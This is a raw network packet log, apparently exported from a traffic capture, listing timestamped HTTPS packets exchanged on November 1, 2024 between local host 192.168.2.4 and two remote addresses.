                                                                                                                                                  Nov 1, 2024 10:51:03.984523058 CET49777443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:03.984569073 CET49777443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:03.984577894 CET44349777104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:03.984586000 CET49777443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:03.984597921 CET44349777104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:03.984760046 CET49777443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:03.984814882 CET49777443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:03.984837055 CET49777443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:03.989011049 CET44349777104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:03.989094973 CET49777443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:03.989113092 CET44349777104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.005590916 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.005846024 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.005907059 CET49772443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.005951881 CET49772443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.005964994 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.005975008 CET49772443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.005980015 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.008398056 CET49778443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.008419991 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.008486032 CET49778443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.008614063 CET49778443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.008620024 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.078002930 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.078350067 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.078409910 CET49773443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.078433990 CET49773443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.078444958 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.078454971 CET49773443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.078459024 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.080319881 CET49779443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.080349922 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.080415010 CET49779443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.080535889 CET49779443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.080549955 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.089531898 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.089854002 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.089934111 CET49776443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.090040922 CET49776443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.090048075 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.090071917 CET49776443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.090075970 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.091860056 CET49780443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.091873884 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.091937065 CET49780443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.092046022 CET49780443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.092056990 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.101679087 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.101793051 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.101907969 CET49775443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.101999044 CET49775443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.101999044 CET49775443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.102004051 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.102010965 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.103698015 CET49781443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.103720903 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.103785038 CET49781443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.103899002 CET49781443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.103913069 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.105695009 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.105798006 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.105849981 CET49774443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.105940104 CET49774443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.105947971 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.105956078 CET49774443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.105959892 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.107530117 CET49782443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.107543945 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.107606888 CET49782443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.107745886 CET49782443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.107755899 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.727399111 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.728249073 CET49778443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.728260994 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.728590965 CET49778443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.728595018 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.799474955 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.799902916 CET49779443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.799917936 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.800342083 CET49779443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.800348043 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.834882021 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.835345030 CET49780443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.835361004 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.835819960 CET49780443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.835824966 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.840887070 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.841305017 CET49782443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.841310978 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.841664076 CET49782443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.841667891 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.847743034 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.848149061 CET49781443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.848169088 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.848535061 CET49781443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.848540068 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.856481075 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.856939077 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.856988907 CET49778443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.857048988 CET49778443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.857060909 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.857069969 CET49778443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.857074022 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.859332085 CET49783443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.859359026 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.859428883 CET49783443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.859533072 CET49783443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.859545946 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.941809893 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.958076954 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.961301088 CET49779443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.961483955 CET49779443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.961493969 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.961517096 CET49779443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.961522102 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.963435888 CET49784443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.963464975 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.965260029 CET49784443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.965372086 CET49784443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.965384007 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.968082905 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.968139887 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.969249964 CET49780443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.969278097 CET49780443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.969278097 CET49780443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.969290018 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.969296932 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.970804930 CET49785443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.970841885 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.970911980 CET49785443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.971026897 CET49785443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.971044064 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.973803043 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.974618912 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.974675894 CET49782443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.974709988 CET49782443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.974714994 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.974724054 CET49782443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.974728107 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.976397991 CET49786443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.976408005 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.976475000 CET49786443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.976592064 CET49786443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.976600885 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.999419928 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.999545097 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.999598026 CET49781443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.999634981 CET49781443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.999648094 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:04.999658108 CET49781443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:04.999663115 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.001343012 CET49787443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.001359940 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.001425982 CET49787443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.001529932 CET49787443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.001543999 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.589380980 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.590001106 CET49783443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.590023994 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.590693951 CET49783443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.590701103 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.695262909 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.695707083 CET49784443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.695724964 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.695991993 CET49784443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.695996046 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.704657078 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.704962969 CET49785443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.704987049 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.705337048 CET49785443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.705342054 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.707118034 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.707400084 CET49786443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.707406044 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.707743883 CET49786443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.707747936 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.719804049 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.719981909 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.720045090 CET49783443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.720200062 CET49783443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.720200062 CET49783443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.720217943 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.720228910 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.722668886 CET49788443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.722697973 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.722768068 CET49788443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.722877026 CET49788443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.722888947 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.825093985 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.825373888 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.825428009 CET49784443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.825464964 CET49784443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.825475931 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.825505972 CET49784443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.825510025 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.827770948 CET49789443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.827817917 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.827884912 CET49789443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.828011990 CET49789443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.828028917 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.833920002 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.833995104 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.834047079 CET49785443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.834171057 CET49785443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.834186077 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.834194899 CET49785443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.834199905 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.836095095 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.836158991 CET49790443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.836169958 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.836225986 CET49790443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.836236954 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.836280107 CET49786443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.836325884 CET49786443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.836329937 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.836343050 CET49786443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.836344957 CET49790443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.836345911 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.836355925 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.838021994 CET49791443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.838032961 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:05.838109016 CET49791443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.838222027 CET49791443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:05.838234901 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.080244064 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.081262112 CET49787443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.081273079 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.081790924 CET49787443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.081795931 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.207972050 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.208031893 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.208121061 CET49787443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.208276987 CET49787443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.208292007 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.208324909 CET49787443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.208328962 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.211013079 CET49792443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.211038113 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.211112976 CET49792443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.211275101 CET49792443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.211287022 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.439706087 CET44349777104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.439822912 CET44349777104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.439960957 CET49777443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:06.440053940 CET49777443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:06.440059900 CET44349777104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.444446087 CET49793443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:06.444466114 CET44349793104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.444564104 CET49793443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:06.444844007 CET49793443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:06.444854975 CET44349793104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.488044024 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.488858938 CET49788443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.488871098 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.489587069 CET49788443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.489590883 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.566510916 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.567050934 CET49791443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.567109108 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.567500114 CET49791443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.567513943 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.568624973 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.569027901 CET49789443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.569035053 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.569444895 CET49789443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.569448948 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.578022003 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.578466892 CET49790443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.578474998 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.579080105 CET49790443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.579083920 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.622977018 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.623054028 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.623104095 CET49788443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.623214006 CET49788443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.623219967 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.623229027 CET49788443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.623233080 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.625684023 CET49794443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.625696898 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.625773907 CET49794443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.625925064 CET49794443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.625933886 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.708398104 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.708749056 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.708800077 CET49790443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.708885908 CET49790443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.708890915 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.708925009 CET49790443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.708929062 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.710752964 CET49795443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.710782051 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.710840940 CET49795443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.710957050 CET49795443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.710969925 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.873142004 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.873212099 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.873265028 CET49789443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.873378992 CET49789443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.873394966 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:06.873409033 CET49789443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:06.873415947 CET4434978913.107.246.45192.168.2.4
